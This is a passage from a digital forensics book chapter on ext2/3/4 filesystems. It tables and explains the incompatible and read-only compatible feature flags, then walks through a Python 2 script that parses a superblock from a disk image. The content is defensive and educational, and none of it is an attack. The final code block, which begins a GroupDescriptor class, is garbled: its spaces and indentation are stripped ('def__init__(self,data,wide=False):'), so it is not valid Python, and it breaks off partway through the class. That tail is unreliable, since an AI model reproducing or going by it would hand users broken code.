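The idea of identifying a file by its signature rather than its extension can be sketched in a few lines. This is a toy illustration, not how the file command is implemented (it consults a much larger database of patterns); the function name and the short signature list are chosen only for this example.

```python
# A tiny, hand-picked list of well-known file signatures.
SIGNATURES = [
    (b'ID3', 'MP3 audio with an ID3v2 tag'),
    (b'\x7fELF', 'ELF executable or library'),
    (b'%PDF', 'PDF document'),
    (b'\x89PNG\r\n\x1a\n', 'PNG image'),
]

def guess_type(first_bytes):
    """Guess a file type from its leading bytes, ignoring its name."""
    for magic, description in SIGNATURES:
        if first_bytes.startswith(magic):
            return description
    return 'unknown'

print(guess_type(b'ID3\x03\x00\x00\x00'))
print(guess_type(b'just some text'))
```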
Incompatible features
Incompatible features are those that could lead to data corruption or misinterpretation when a filesystem is mounted by a system that doesn’t support them, even when mounted read-only. Not surprisingly, the list of incompatible features is longer than the compatible features list. It should go without saying that if you should not mount a filesystem, it would be a very bad idea to run fsck against it. Incompatible features are summarized in Table 7.3.
Table 7.3. Incompatible Features.
Bit      Name         Description
0x1      Compression  Filesystem is compressed
0x2      Filetype     Directory entries include the file type
0x4      Recover      Filesystem needs recovery
0x8      JournalDev   Journal is stored on an external device
0x10     MetaBG       Meta block groups are in use
0x40     Extents      Filesystem uses extents
0x80     64Bit        Filesystem can be 2^64 blocks (as opposed to 2^32)
0x100    MMP          Multiple mount protection
0x200    FlexBG       Flexible block groups are in use
0x400    EAInode      Inodes can be used for large extended attributes
0x1000   DirData      Data in directory entry
0x2000   BGMetaCsum   Block Group meta checksums
0x4000   LargeDir     Directories > 2 GB or 3-level htree
0x8000   InlineData   Data inline in the inode
0x10000  Encrypt      Encrypted inodes are used in this filesystem
The Compression feature indicates that certain filesystem components may be compressed. Obviously, if your operating system does not support this feature, you will not be able to get meaningful data from the volume.
On extended filesystems the file type is normally stored in the inode with all the other metadata. In order to speed up certain operations, the file type may also be stored in the directory entry if the Filetype feature is enabled. This is done by re-purposing an unused byte in the directory entry. This will be discussed in detail later in this chapter.
The Recover feature flag indicates that a filesystem needs to be recovered. The journal will be consulted during this recovery process. While the journal is normally stored on the same media as the filesystem, it may be stored on an external device if the Journal Dev feature is enabled. The use of Journal Dev is not terribly common, but there are some situations where the performance improvement justifies the extra complexity.
The Meta Block Group feature breaks up a filesystem into many meta block groups sized so that group descriptors can be stored in a single block. This allows filesystems larger than 256 terabytes to be used.
The Extents feature allows more efficient handling of large files. Extents are similar to NTFS data runs in that they allow large files to be more efficiently stored and accessed. Extents will be discussed in detail later in this chapter.
The 64-bit feature increases the maximum number of blocks from 2^32 to 2^64. This is not a terribly common feature, as 32-bit mode already supports filesystems as large as 16 terabytes with 4 kB blocks (2^32 * 4 kB), or 256 terabytes with 64 kB blocks. It is more likely to be found when a small block size is desirable, such as with a server that stores a large number of small files.
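The size limits follow directly from multiplying the number of addressable blocks by the block size. The short sketch below works through that arithmetic; the function name is invented, and the three block sizes are just sample values (whether a given system can actually use 64 kB blocks depends on the kernel and hardware).

```python
TIB = 2 ** 40   # one terabyte (binary)

def max_fs_bytes(address_bits, block_size):
    """Largest filesystem addressable with the given block number width."""
    return (2 ** address_bits) * block_size

# 32-bit block numbers with a few sample block sizes.
for block_size in (1024, 4096, 65536):
    print(block_size, max_fs_bytes(32, block_size) // TIB, 'TB')
```

With 1 kB blocks the 32-bit limit is only 4 terabytes, which is why small block sizes are where 64-bit mode becomes attractive.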
The Multiple Mount Protection feature is used to detect if more than one operating system or process is using a filesystem. When this feature is enabled, any attempts to mount an already mounted filesystem should fail. As a double-check, the mount status (sequence number) is rechecked periodically and the filesystem is remounted read-only if the operating system detects that another entity has mounted it.
Like extents, flexible block groups are used to more efficiently handle large files. When the Flex Block Group feature is enabled, some of the items in adjacent block groups are moved around to allow more data blocks in some groups so that large files have a better chance of being stored contiguously. This feature is often used in conjunction with extents.
Extended attributes were discussed in the previous section. If extended attributes are supported, they may be stored in the inodes or in data blocks. If the Extended Attribute Inode flag is set, then the operating system must support reading extended attributes from the inodes wherever they exist.
We have seen several features that allow more efficient processing of large files. The Directory Data feature is an optimization for small files. When this feature is enabled, small files can be stored completely within their directory entry. Larger files may be split between the directory entry and data blocks. Because the first few bytes often contain a file signature, storing the beginning of a file in the directory entry can speed up many operations by eliminating the need to read data blocks to determine the file type. The Inline Data feature is similar, but data is stored in the inodes instead of the directory entries.
The remaining incompatible features are Block Group Meta Checksum, Large Directory, and Encrypt, which indicate that checksums for metadata are stored in the block groups, that directories larger than 2 gigabytes or using 3-level hash trees are present, and that inodes are encrypted, respectively. None of these three features are common.
Of all of these incompatible features, we are most interested in the ones that affect our filesystem layout. There are three such features: Flexible Block Groups, Meta Block Groups, and 64-bit Mode. Flexible block groups combine multiple block groups together in a flex group. The flex group size is normally a power of two. The data and inode bitmaps and the inode table are only present in the first block group within the flex group. This allows some block groups to consist entirely of data blocks, which allows large files to be stored without fragmentation.
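Given the loggroupperflex value from the superblock (offset 0x174 in Table 7.1), working out which flex group a block group belongs to, and which block group holds that flex group's bitmaps and inode table, is simple integer arithmetic. The helper names below are invented for this sketch, and the sample value of 4 (16 groups per flex group) is an assumption for illustration.

```python
def flex_group_size(log_groups_per_flex):
    """Number of block groups in each flex group (a power of two)."""
    return 1 << log_groups_per_flex

def flex_group_of(block_group, log_groups_per_flex):
    """Index of the flex group containing the given block group."""
    return block_group >> log_groups_per_flex

def first_group_in_flex(block_group, log_groups_per_flex):
    """Block group that carries the bitmaps and inode table for the
    flex group containing block_group."""
    size = flex_group_size(log_groups_per_flex)
    return (block_group // size) * size

# Sample value: 2^4 = 16 block groups per flex group.
print(flex_group_size(4), flex_group_of(37, 4), first_group_in_flex(37, 4))
```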
When meta block groups are in use, the filesystem is partitioned into several logical chunks called meta block groups. The group descriptors are only found in the first, second, and last block group for each meta block group.
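The following sketch shows one way to work out which block groups hold descriptor copies for a given meta block group. It assumes that a meta block group spans as many block groups as there are descriptors in one block, and that descriptors are 32 bytes (or 64 bytes in 64-bit mode); in practice the descriptor size should be taken from the descsize field of the superblock. The function names are invented for this example.

```python
def groups_per_meta_bg(block_size, descriptor_size):
    """Block groups whose descriptors fit in a single block."""
    return block_size // descriptor_size

def descriptor_groups(meta_bg, block_size, descriptor_size):
    """First, second, and last block group of a meta block group,
    which is where its group descriptors are stored."""
    count = groups_per_meta_bg(block_size, descriptor_size)
    first = meta_bg * count
    return [first, first + 1, first + count - 1]

print(groups_per_meta_bg(4096, 32))        # 32-byte descriptors
print(descriptor_groups(1, 4096, 64))      # 64-byte descriptors
```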
The use of 64-bit mode does not directly affect the filesystem layout. Rather, the effect is indirect as some structures will grow in size when 64-bit mode is in use.
Read-only compatible features
Read-only compatible features are required to be supported in order to alter data, but not needed to correctly read data. Obviously, if your operating system does not support one or more of these features, you should not run fsck against the filesystem. Read-only compatible features are summarized in Table 7.4.
Table 7.4. Read-only Compatible Features.
Bit     Name          Description
0x1     SparseSuper   Sparse superblocks (only in BG 0 or power of 3, 5, or 7)
0x2     LargeFile     File(s) larger than 2 GB exist on the filesystem
0x4     BtreeDir      Btrees are used in directories (not common)
0x8     HugeFile      File sizes are represented in logical blocks, not sectors
0x10    GdtCsum       Group descriptor tables have checksums
0x20    DirNlink      Subdirectories are not limited to 32k entries
0x40    ExtraIsize    Indicates large inodes are present on the filesystem
0x80    HasSnapshot   Filesystem has a snapshot
0x100   Quota         Disk quotas are being used on the filesystem
0x200   BigAlloc      File extents are tracked in multi-block clusters
0x400   MetadataCsum  Checksums are used on metadata items
0x800   Replica       The filesystem supports replicas
0x1000  ReadOnly      Should only be mounted as read-only
When the Sparse Superblock feature is in use, the superblock is only found in block group 0 or in block groups that are a power of 3, 5, or 7 (this includes group 1, the zeroth power). If there is at least one file greater than 2 gigabytes on the filesystem, the Large File feature flag will be set. The Huge File feature flag indicates at least one huge file is present. Huge files have their sizes specified in logical blocks (the size of which is stored in the superblock) instead of 512-byte sectors.
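The sparse superblock rule is easy to express in code. The sketch below, with invented function names, reports whether a given block group should contain a superblock copy. Note that group 1 qualifies because 1 is the zeroth power of 3, 5, and 7.

```python
def is_power_of(number, base):
    """True if number is base raised to some non-negative integer."""
    while number > 1 and number % base == 0:
        number //= base
    return number == 1

def has_superblock_backup(block_group):
    """Apply the Sparse Super rule: group 0 plus powers of 3, 5, and 7."""
    if block_group == 0:
        return True
    return any(is_power_of(block_group, base) for base in (3, 5, 7))

print([g for g in range(50) if has_superblock_backup(g)])
```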
The Btree Directory feature allows large directories to be stored in B-trees. This is not common. Another feature related to large directories is Directory Nlink. When the Directory Nlink flag is set, subdirectories are not limited to 32,768 entries as in previous versions of ext3.
The GDT Checksum feature allows checksums to be stored in the group descriptor tables. The Extra Isize feature flag indicates that large inodes are present on the filesystem. If a filesystem snapshot is present, the Has Snapshot flag will be set. Disk quota use is indicated by the Quota feature flag.
The Big Alloc feature is useful if most of the files on the filesystem are huge. When this is in use, file extents (discussed later in this chapter) and other filesystem structures use multi-block clusters for units. The Metadata Checksum flag indicates that checksums are stored for the metadata items in inodes, etc. If a filesystem supports replicas, the Replica flag will be set. A filesystem with the Read Only flag set should only be mounted as read-only. This flag can be set to prevent others from modifying the filesystem’s contents.
Only two features in the read-only compatible set affect the filesystem layout: Sparse Super Blocks and Extra Isize. Sparse super blocks affect which block groups have superblock backups. Like 64-bit mode, the Extra Isize feature affects the layout indirectly by changing the inode size.
USING PYTHON
We have seen how fsstat and other tools can be used to get metadata from an image file. We will now turn our attention to using Python to extract this information. Some of you might question going to the trouble of creating some Python code when tools already exist for this purpose. This is certainly a fair question.
I do think developing some Python modules is a good idea for a number of reasons. First, I have found that tools such as The Sleuth Kit (TSK) do not appear to be completely up to date. As you will see when running the Python scripts from this section, there are several features in use on the PFE subject filesystem that are not reported by TSK.
Second, it is useful to have some Python code that you understand in your toolbox. This allows you to modify the code as new features are added. It also allows you to integrate filesystem data into other scripts you might use.
Third, walking through these structures in order to develop the Python code helps you to better understand and learn how the extended filesystems work. If you are new to Python, you might also learn something new along the way. We begin our journey by creating code to read the superblock.
Reading the superblock
The following code will allow you to read a superblock from a disk image. We will walk through most, but not all, of this code. A note on formatting: many of the comments that were originally at the end of lines have been moved to the line above to make the code more legible in this book.
#!/usr/bin/python
#
# extfs.py
#
# This is a simple Python script that will
# get metadata from an ext2/3/4 filesystem inside
# of an image file.
#
# Developed for PentesterAcademy
# by Dr. Phil Polstra (@ppolstra)
import sys
import os.path
import subprocess
import struct
import time

# these are simple functions to make conversions easier
def getU32(data, offset=0):
    return struct.unpack('<L', data[offset:offset+4])[0]

def getU16(data, offset=0):
    return struct.unpack('<H', data[offset:offset+2])[0]

def getU8(data, offset=0):
    return struct.unpack('B', data[offset:offset+1])[0]

def getU64(data, offset=0):
    return struct.unpack('<Q', data[offset:offset+8])[0]

# this function doesn't unpack the string because
# it isn't really a number but a UUID
def getU128(data, offset=0):
    return data[offset:offset+16]

def printUuid(data):
    retStr = \
        format(struct.unpack('<Q', data[8:16])[0], 'X').zfill(16) + \
        format(struct.unpack('<Q', data[0:8])[0], 'X').zfill(16)
    return retStr

def getCompatibleFeaturesList(u32):
    retList = []
    if u32 & 0x1:
        retList.append('Directory Preallocate')
    if u32 & 0x2:
        retList.append('Imagic Inodes')
    if u32 & 0x4:
        retList.append('Has Journal')
    if u32 & 0x8:
        retList.append('Extended Attributes')
    if u32 & 0x10:
        retList.append('Resize Inode')
    if u32 & 0x20:
        retList.append('Directory Index')
    if u32 & 0x40:
        retList.append('Lazy Block Groups')
    if u32 & 0x80:
        retList.append('Exclude Inode')
    if u32 & 0x100:
        retList.append('Exclude Bitmap')
    if u32 & 0x200:
        retList.append('Sparse Super 2')
    return retList

def getIncompatibleFeaturesList(u32):
    retList = []
    if u32 & 0x1:
        retList.append('Compression')
    if u32 & 0x2:
        retList.append('Filetype')
    if u32 & 0x4:
        retList.append('Recover')
    if u32 & 0x8:
        retList.append('Journal Device')
    if u32 & 0x10:
        retList.append('Meta Block Groups')
    if u32 & 0x40:
        retList.append('Extents')
    if u32 & 0x80:
        retList.append('64-bit')
    if u32 & 0x100:
        retList.append('Multiple Mount Protection')
    if u32 & 0x200:
        retList.append('Flexible Block Groups')
    if u32 & 0x400:
        retList.append('Extended Attributes in Inodes')
    if u32 & 0x1000:
        retList.append('Directory Data')
    if u32 & 0x2000:
        retList.append('Block Group Metadata Checksum')
    if u32 & 0x4000:
        retList.append('Large Directory')
    if u32 & 0x8000:
        retList.append('Inline Data')
    if u32 & 0x10000:
        retList.append('Encrypted Inodes')
    return retList

def getReadonlyCompatibleFeaturesList(u32):
    retList = []
    if u32 & 0x1:
        retList.append('Sparse Super')
    if u32 & 0x2:
        retList.append('Large File')
    if u32 & 0x4:
        retList.append('Btree Directory')
    if u32 & 0x8:
        retList.append('Huge File')
    if u32 & 0x10:
        retList.append('Group Descriptor Table Checksum')
    if u32 & 0x20:
        retList.append('Directory Nlink')
    if u32 & 0x40:
        retList.append('Extra Isize')
    if u32 & 0x80:
        retList.append('Has Snapshot')
    if u32 & 0x100:
        retList.append('Quota')
    if u32 & 0x200:
        retList.append('Big Alloc')
    if u32 & 0x400:
        retList.append('Metadata Checksum')
    if u32 & 0x800:
        retList.append('Replica')
    if u32 & 0x1000:
        retList.append('Read-only')
    return retList

# This class will parse the data in a superblock
class Superblock():
    def __init__(self, data):
        self.totalInodes = getU32(data)
        self.totalBlocks = getU32(data, 4)
        self.restrictedBlocks = getU32(data, 8)
        self.freeBlocks = getU32(data, 0xc)
        self.freeInodes = getU32(data, 0x10)
        # normally 0 unless block size is <4k
        self.firstDataBlock = getU32(data, 0x14)
        # block size is 1024 * 2^(whatever is in this field)
        # (** is exponentiation; ^ would be bitwise XOR in Python)
        self.blockSize = 2 ** (10 + getU32(data, 0x18))
        # only used if bigalloc feature enabled
        self.clusterSize = 2 ** (getU32(data, 0x1c))
        self.blocksPerGroup = getU32(data, 0x20)
        # only used if bigalloc feature enabled
        self.clustersPerGroup = getU32(data, 0x24)
        self.inodesPerGroup = getU32(data, 0x28)
        self.mountTime = time.gmtime(getU32(data, 0x2c))
        self.writeTime = time.gmtime(getU32(data, 0x30))
        # mounts since last fsck
        self.mountCount = getU16(data, 0x34)
        # mounts between fsck
        self.maxMountCount = getU16(data, 0x36)
        self.magic = getU16(data, 0x38) # should be 0xef53
        # 0001/0002/0004 = cleanly unmounted/errors/orphans
        self.state = getU16(data, 0x3a)
        # when errors 1/2/3 continue/read-only/panic
        self.errors = getU16(data, 0x3c)
        self.minorRevision = getU16(data, 0x3e)
        # last fsck time
        self.lastCheck = time.gmtime(getU32(data, 0x40))
        # seconds between checks
        self.checkInterval = getU32(data, 0x44)
        # 0/1/2/3/4 Linux/Hurd/Masix/FreeBSD/Lites
        self.creatorOs = getU32(data, 0x48)
        # 0/1 original/v2 with dynamic inode sizes
        self.revisionLevel = getU32(data, 0x4c)
        # UID for reserved blocks
        self.defaultResUid = getU16(data, 0x50)
        # GID for reserved blocks
        self.defaultRegGid = getU16(data, 0x52)
        # for Ext4 dynamic revisionLevel superblocks only!
        # first non-reserved inode
        self.firstInode = getU32(data, 0x54)
        # inode size in bytes
        self.inodeSize = getU16(data, 0x58)
        # block group this superblock is in
        self.blockGroupNumber = getU16(data, 0x5a)
        # compatible features
        self.compatibleFeatures = getU32(data, 0x5c)
        self.compatibleFeaturesList = \
            getCompatibleFeaturesList(self.compatibleFeatures)
        # incompatible features
        self.incompatibleFeatures = getU32(data, 0x60)
        self.incompatibleFeaturesList = \
            getIncompatibleFeaturesList(self.incompatibleFeatures)
        # read-only compatible features
        self.readOnlyCompatibleFeatures = getU32(data, 0x64)
        self.readOnlyCompatibleFeaturesList = \
            getReadonlyCompatibleFeaturesList(\
            self.readOnlyCompatibleFeatures)
        # UUID for volume left as a packed string
        self.uuid = getU128(data, 0x68)
        # volume name - likely empty
        self.volumeName = data[0x78:0x88].split("\x00")[0]
        # directory where last mounted
        self.lastMounted = data[0x88:0xc8].split("\x00")[0]
        # used with compression
        self.algorithmUsageBitmap = getU32(data, 0xc8)
        # not used in ext4
        self.preallocBlocks = getU8(data, 0xcc)
        # only used with DIR_PREALLOC feature
        self.preallocDirBlock = getU8(data, 0xcd)
        # blocks reserved for future expansion
        self.reservedGdtBlocks = getU16(data, 0xce)
        # UUID of journal superblock
        self.journalUuid = getU128(data, 0xd0)
        # inode number of journal file
        self.journalInode = getU32(data, 0xe0)
        # device number for journal if external journal used
        self.journalDev = getU32(data, 0xe4)
        # start of list of orphaned inodes to delete
        self.lastOrphan = getU32(data, 0xe8)
        self.hashSeed = []
        self.hashSeed.append(getU32(data, 0xec)) # htree hash seed
        self.hashSeed.append(getU32(data, 0xf0))
        self.hashSeed.append(getU32(data, 0xf4))
        self.hashSeed.append(getU32(data, 0xf8))
        # 0/1/2/3/4/5 legacy/half MD4/tea/u-legacy/u-half MD4/u-Tea
        self.hashVersion = getU8(data, 0xfc)
        self.journalBackupType = getU8(data, 0xfd)
        # group descriptor size if 64-bit feature enabled
        self.descriptorSize = getU16(data, 0xfe)
        self.defaultMountOptions = getU32(data, 0x100)
        # only used with meta bg feature
        self.firstMetaBlockGroup = getU32(data, 0x104)
        # when was the filesystem created
        self.mkfsTime = time.gmtime(getU32(data, 0x108))
        self.journalBlocks = []
        # backup copy of journal inodes and size in last two elements
        for i in range(0, 17):
            self.journalBlocks.append(getU32(data, 0x10c + i*4))
        # for 64-bit mode only
        self.blockCountHi = getU32(data, 0x150)
        self.reservedBlockCountHi = getU32(data, 0x154)
        self.freeBlocksHi = getU32(data, 0x158)
        # all inodes should have at least this much space
        self.minInodeExtraSize = getU16(data, 0x15c)
        # new inodes should reserve this many bytes
        self.wantInodeExtraSize = getU16(data, 0x15e)
        # 1/2/4 signed hash/unsigned hash/test code
        self.miscFlags = getU32(data, 0x160)
        # logical blocks read from disk in RAID before moving to next disk
        self.raidStride = getU16(data, 0x164)
        # seconds to wait between multi-mount checks
        self.mmpInterval = getU16(data, 0x166)
        # block number for MMP data
        self.mmpBlock = getU64(data, 0x168)
        # how many blocks read/write till back on this disk
        self.raidStripeWidth = getU32(data, 0x170)
        # groups per flex group
        self.groupsPerFlex = 2 ** (getU8(data, 0x174))
        # should be 1 for crc32
        self.metadataChecksumType = getU8(data, 0x175)
        self.reservedPad = getU16(data, 0x176) # should be zeroes
        # kilobytes written for all time
        self.kilobytesWritten = getU64(data, 0x178)
        # inode of active snapshot
        self.snapshotInode = getU32(data, 0x180)
        # id of the active snapshot
        self.snapshotId = getU32(data, 0x184)
        # blocks reserved for snapshot
        self.snapshotReservedBlocks = getU64(data, 0x188)
        # inode number of head of snapshot list
        self.snapshotList = getU32(data, 0x190)
        self.errorCount = getU32(data, 0x194)
        # time first error detected
        self.firstErrorTime = time.gmtime(getU32(data, 0x198))
        self.firstErrorInode = getU32(data, 0x19c) # guilty inode
        self.firstErrorBlock = getU64(data, 0x1a0) # guilty block
        # guilty function
        self.firstErrorFunction = data[0x1a8:0x1c8].split("\x00")[0]
        # line number where error occurred
        self.firstErrorLine = getU32(data, 0x1c8)
        # time last error detected
        self.lastErrorTime = time.gmtime(getU32(data, 0x1cc))
        self.lastErrorInode = getU32(data, 0x1d0) # guilty inode
        # line number where error occurred
        self.lastErrorLine = getU32(data, 0x1d4)
        self.lastErrorBlock = getU64(data, 0x1d8) # guilty block
        # guilty function
        self.lastErrorFunction = data[0x1e0:0x200].split("\x00")[0]
        # mount options in null-terminated string
        self.mountOptions = data[0x200:0x240].split("\x00")[0]
        # inode of user quota file
        self.userQuotaInode = getU32(data, 0x240)
        # inode of group quota file
        self.groupQuotaInode = getU32(data, 0x244)
        self.overheadBlocks = getU32(data, 0x248) # should be zero
        self.backupBlockGroups = [getU32(data, 0x24c), \
            getU32(data, 0x250)] # super sparse 2 only
        # four one-byte algorithm codes starting at 0x254
        self.encryptionAlgorithms = []
        for i in range(0, 4):
            self.encryptionAlgorithms.append(getU8(data, 0x254 + i))
        self.checksum = getU32(data, 0x3fc)

    def printState(self):
        # 0001/0002/0004 = cleanly unmounted/errors/orphans
        retVal = "Unknown"
        if self.state == 1:
            retVal = "Cleanly unmounted"
        elif self.state == 2:
            retVal = "Errors detected"
        elif self.state == 4:
            retVal = "Orphans being recovered"
        return retVal

    def printErrorBehavior(self):
        # when errors 1/2/3 continue/read-only/panic
        retVal = "Unknown"
        if self.errors == 1:
            retVal = "Continue"
        elif self.errors == 2:
            retVal = "Remount read-only"
        elif self.errors == 3:
            retVal = "Kernel panic"
        return retVal

    def printCreator(self):
        # 0/1/2/3/4 Linux/Hurd/Masix/FreeBSD/Lites
        retVal = "Unknown"
        if self.creatorOs == 0:
            retVal = "Linux"
        elif self.creatorOs == 1:
            retVal = "Hurd"
        elif self.creatorOs == 2:
            retVal = "Masix"
        elif self.creatorOs == 3:
            retVal = "FreeBSD"
        elif self.creatorOs == 4:
            retVal = "Lites"
        return retVal

    def printHashAlgorithm(self):
        # 0/1/2/3/4/5 legacy/half MD4/tea/u-legacy/u-half MD4/u-Tea
        retVal = "Unknown"
        if self.hashVersion == 0:
            retVal = "Legacy"
        elif self.hashVersion == 1:
            retVal = "Half MD4"
        elif self.hashVersion == 2:
            retVal = "Tea"
        elif self.hashVersion == 3:
            retVal = "Unsigned Legacy"
        elif self.hashVersion == 4:
            retVal = "Unsigned Half MD4"
        elif self.hashVersion == 5:
            retVal = "Unsigned Tea"
        return retVal

    def printEncryptionAlgorithms(self):
        encList = []
        for v in self.encryptionAlgorithms:
            if v == 1:
                encList.append('256-bit AES in XTS mode')
            elif v == 2:
                encList.append('256-bit AES in GCM mode')
            elif v == 3:
                encList.append('256-bit AES in CBC mode')
            elif v == 0:
                pass
            else:
                encList.append('Unknown')
        return encList

    def prettyPrint(self):
        for k, v in self.__dict__.iteritems():
            if k == 'mountTime' or k == 'writeTime' or \
               k == 'lastCheck' or k == 'mkfsTime' or \
               k == 'firstErrorTime' or k == 'lastErrorTime':
                print k + ":", time.asctime(v)
            elif k == 'state':
                print k + ":", self.printState()
            elif k == 'errors':
                print k + ":", self.printErrorBehavior()
            elif k == 'uuid' or k == 'journalUuid':
                print k + ":", printUuid(v)
            elif k == 'creatorOs':
                print k + ":", self.printCreator()
            elif k == 'hashVersion':
                print k + ":", self.printHashAlgorithm()
            elif k == 'encryptionAlgorithms':
                print k + ":", self.printEncryptionAlgorithms()
            else:
                print k + ":", v

def usage():
    print("usage " + sys.argv[0] + \
        " <image file> <offset in sectors>\n" + \
        "Reads superblock from an image file")
    exit(1)

def main():
    if len(sys.argv) < 3:
        usage()
    # read first sector
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + \
            " cannot be opened for reading")
        exit(1)
    # the superblock starts 1024 bytes past the start of the partition
    with open(sys.argv[1], 'rb') as f:
        f.seek(1024 + int(sys.argv[2]) * 512)
        sbRaw = str(f.read(1024))
    sb = Superblock(sbRaw)
    sb.prettyPrint()

if __name__ == "__main__":
    main()
This script begins with the usual she-bang line followed by a few import statements. I then define a few helper functions, getU32, etc., that take a packed string with an optional offset and return the appropriate numerical value. All of these functions use struct.unpack. These were created to make the code that follows a bit cleaner and easier to read.
Next you will see the printUuid function, which prints a 16-byte UUID in the correct format. This is followed by three functions which return lists of strings representing the compatible, incompatible, and read-only compatible feature lists. These three functions use the bitwise AND operator, &, to test if the appropriate bit in one of the feature bitmaps is set.
Next we see the definition for the Superblock class. Like all proper Python classes, this begins with a constructor, which you will recall is named __init__ in Python. The constructor consists of a long list of calls to the helper functions defined at the beginning of the script. Most of this constructor is straightforward. A few of the less obvious lines are commented.
There are a number of time fields in the superblock. All of these fields store times in seconds since the epoch (January 1, 1970, at midnight). These seconds are converted to times by calling time.gmtime(<seconds since epoch>). For example, self.mountTime = time.gmtime(getU32(data, 0x2c)) is used to set the mountTime variable in the Superblock class.
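As a small illustration of the conversion just described, the sketch below turns a raw timestamp into a readable UTC string. The helper name epoch_to_utc and the sample value are assumptions made for this example and are not part of the script in this chapter. It is written for Python 3, unlike the Python 2 listings in this book.

```python
import time

def epoch_to_utc(seconds):
    """Convert seconds since the epoch to a readable UTC string."""
    # time.gmtime returns a struct_time in UTC; time.asctime formats it
    return time.asctime(time.gmtime(seconds))

# hypothetical value such as might be read from offset 0x2c (mount time)
sample = 1435708800
print(epoch_to_utc(sample))
```

Using gmtime rather than localtime keeps the result independent of the timezone configured on the forensic workstation.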
The split function used in the constructor is new. The split function is used to split a string on a character or set of characters. The syntax for split is string.split(<string>[, <separators>[, <maxsplit>]]). If the separator is not specified, the string is split on whitespace characters. Lines such as self.volumeName = data[0x78:0x88].split("\x00")[0] are used to split a string on a null character ("\x00") and keep only everything before the null byte. This is done to prevent random bytes after the null from corrupting our value.
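The null-splitting idiom can be tried on its own. The following is a minimal sketch, assuming Python 3 (where the raw data is a bytes object rather than a Python 2 string); the function name c_string and the sample field contents are hypothetical.

```python
def c_string(raw):
    """Return the bytes before the first null byte in a fixed-width field."""
    # split(b"\x00") breaks the field at every null; element 0 is the text
    return raw.split(b"\x00")[0]

# a hypothetical 16-byte volume name field with leftover bytes after the null
field = b"rootfs\x00junk\x00\x00\x00\x00\x00"
print(c_string(field))
```

Taking only element zero discards both the padding nulls and any stale bytes that follow the first terminator.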
In a few cases, an empty list is created and then the append function is used to add items to the list. There are also a few sizes that are stored as powers of two. With the exceptions noted above, there are no new techniques as yet undiscussed in this book.
The Superblock class then defines a few functions that print the filesystem state, error behavior, creator operating system, hash algorithm, and encryption algorithms in a user-friendly way. The Superblock class ends with a prettyPrint function which is used to print out all the information contained within a superblock object. This function uses a dictionary which is implicitly defined for all Python objects.
For those new to Python, a dictionary is essentially a list with an important difference. Instead of using integer indexes as a key to retrieving items from the list (the values), a string is used as the key. Where empty square brackets are used to define an empty list, empty curly brackets are used to create an empty dictionary. As with lists, square brackets are used to retrieve items. Also, just like lists, items stored in a dictionary may be of different types. It should be noted that in the Python 2 used for the scripts in this book there is no guaranteed order to items in a dictionary, so the order in which items are added is irrelevant.
The implicitly defined dictionary Python creates for each object is called __dict__. The keys are the names of the object's variables and the values are of the same type as whatever is stored in the object. The line for k, v in self.__dict__.iteritems(): in the Superblock.prettyPrint function demonstrates the syntax for creating a for loop that iterates over a dictionary. The if/elif/else block in prettyPrint is used to print the items that are not simple strings or numbers correctly.
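To see the __dict__ technique in isolation, consider the toy class below. It is only a sketch: the class Example and its two fields are invented for illustration, and it uses the Python 3 spelling items() where the Python 2 script calls iteritems().

```python
class Example(object):
    def __init__(self):
        self.magic = 0xef53
        self.state = 1

    def describe_state(self):
        return "Cleanly unmounted" if self.state == 1 else "Unknown"

    def pretty_lines(self):
        lines = []
        # sorted() yields the (name, value) pairs in alphabetical order
        for k, v in sorted(self.__dict__.items()):
            if k == "state":
                # fields that need decoding get special handling
                lines.append(k + ": " + self.describe_state())
            else:
                lines.append(k + ": " + str(v))
        return lines

for line in Example().pretty_lines():
    print(line)
```

Because every attribute assigned in the constructor lands in __dict__ automatically, adding a new field to the class requires no change to the printing loop unless the field needs special decoding.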
The script defines usage and main functions. The if __name__ == "__main__": main() at the end of the script allows it to be run or imported into another script. The main method opens the image file and then seeks to the proper location. Recall that the superblock is 1024 bytes long and begins 1024 bytes into the filesystem. Once the correct bytes have been read, they are passed to the Superblock constructor on the line sb = Superblock(sbRaw) and then the fields of the superblock are printed on the next line, sb.prettyPrint().
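The offset arithmetic used by main can be checked without a real disk image. The sketch below, written for Python 3, builds a tiny in-memory image and reads the superblock from it. The function names, the constants, and the choice of sector 4 as the partition start are assumptions for this example only; the magic value 0xef53 at offset 0x38 comes from the Superblock constructor.

```python
import io
import struct

SECTOR_SIZE = 512
SUPERBLOCK_OFFSET = 1024
SUPERBLOCK_SIZE = 1024

def read_superblock(f, start_sector):
    """Return the raw 1024-byte superblock of a filesystem in an image."""
    f.seek(start_sector * SECTOR_SIZE + SUPERBLOCK_OFFSET)
    return f.read(SUPERBLOCK_SIZE)

def has_ext_magic(sb_raw):
    # the magic number is a little-endian 16-bit value at offset 0x38
    return struct.unpack("<H", sb_raw[0x38:0x3a])[0] == 0xef53

# build a fake image: filesystem starts at sector 4, magic in the right place
start = 4
image = bytearray(start * SECTOR_SIZE + SUPERBLOCK_OFFSET + SUPERBLOCK_SIZE)
struct.pack_into("<H", image,
                 start * SECTOR_SIZE + SUPERBLOCK_OFFSET + 0x38, 0xef53)
raw = read_superblock(io.BytesIO(bytes(image)), start)
print(len(raw), has_ext_magic(raw))
```

Checking the magic number before parsing is a cheap way to catch a wrong partition offset early.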
Partial results from running this new script against the PFE subject system are shown in Figure 7.11. Examining Figure 7.11 you will see that the subject system has the following read-only compatible features: Sparse Super, Large File, Huge File, Group Descriptor Table Checksum, Directory Nlink, and Extra Isize. Upon comparing this to Figure 7.3 you will see that The Sleuth Kit missed two features: Group Descriptor Table Checksum and Directory Nlink! In order to continue building the full picture of how our filesystem is organized, we must read the block group descriptors.
FIGURE 7.11
Partial output of script that reads superblock information.
Reading block group descriptors
The block group descriptors are much simpler and smaller than the superblock. Recall that these group descriptors are 32 bytes long, unless an ext4 filesystem is using 64-bit mode, in which case they are 64 bytes long. The following code defines a GroupDescriptor class. As with the Superblock class, comments that would normally be at the end of a line have been placed above the line to make things more legible in this book.
class GroupDescriptor():
def__init__(self,data,wide=False):
#/*Blocksbitmapblock*/
self.blockBitmapLo=getU32(data)
#/*Inodesbitmapblock*/
self.inodeBitmapLo=getU32(data,4)
#/*Inodestableblock*/
self.inodeTableLo=getU32(data,8)
#/*Freeblockscount*/
self.freeBlocksCountLo=getU16(data,0xc)
#/*Freeinodescount*/
self.freeInodesCountLo=getU16(data,0xe)
#/*Directoriescount*/
self.usedDirsCountLo=getU16(data,0x10)
#/*EXT4_BG_flags(INODE_UNINIT,etc)*/
